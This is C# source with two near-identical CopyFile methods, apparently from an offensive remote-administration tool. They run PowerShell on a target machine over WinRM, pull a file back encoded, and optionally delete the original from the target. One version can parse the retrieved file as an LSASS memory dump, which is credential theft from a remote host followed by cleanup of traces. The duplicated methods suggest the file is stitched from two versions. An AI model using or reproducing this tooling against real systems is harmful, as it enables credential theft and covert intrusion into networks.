public static void CopyFile(string computer, string path, string destination, bool delete = false, string auth = "ntlm", string scheme = "http", bool parseLsass = false)
{
if (auth != "kerberos")
{
auth = "Negotiate";
}
try
{
(Collection <PSObject> result, Collection <ErrorRecord> errors) = InvokeCommand(computer, PsFunction.CopyFile(path), false, auth, scheme, true);
foreach (PSObject obj in result)
{
if (obj.ToString().Length == 0)
{
Console.WriteLine(" [-] Copy Failed");
}
else
{
byte[] compressfile = Convert.FromBase64String(obj.ToString());
byte[] data = Decompress(compressfile);
if (parseLsass)
{
Minidump.Program.parse(data);
}
File.WriteAllBytes(destination, data.ToArray());
Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", data.ToArray().Length, destination));
}
}
if (delete)
{
try
{
(Collection <PSObject> result2, Collection <ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
}
catch
{
Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
}
}
}
catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
{
Console.WriteLine(e.Message);
}
}
public static void CopyFile(string computer, string path, string destination, bool delete = false, string auth = "ntlm", string scheme = "http")
{
if (auth != "kerberos")
{
auth = "Negotiate";
}
try
{
(Collection <PSObject> result, Collection <ErrorRecord> errors) = InvokeCommand(computer, PsFunction.CopyFile(path), false, auth, scheme, true);
foreach (PSObject obj in result)
{
if (obj.ToString().Length == 0)
{
Console.WriteLine(" [-] Copy Failed");
}
else
{
byte[] compressfile = Convert.FromBase64String(obj.ToString());
using (var memoryStream = new MemoryStream(compressfile))
{
using (var gzip = new GZipStream(memoryStream, CompressionMode.Decompress))
{
using (var decompressed = new MemoryStream())
{
gzip.CopyTo(decompressed);
File.WriteAllBytes(destination, decompressed.ToArray());
Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", decompressed.ToArray().Length, destination));
}
}
}
}
}
if (delete)
{
try
{
(Collection <PSObject> result2, Collection <ErrorRecord> errors2) = InvokeCommand(computer, String.Format("remove-item {0} -force", path), false, auth, scheme);
}
catch
{
Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
}
}
}
catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
{
Console.WriteLine(e.Message);
}
}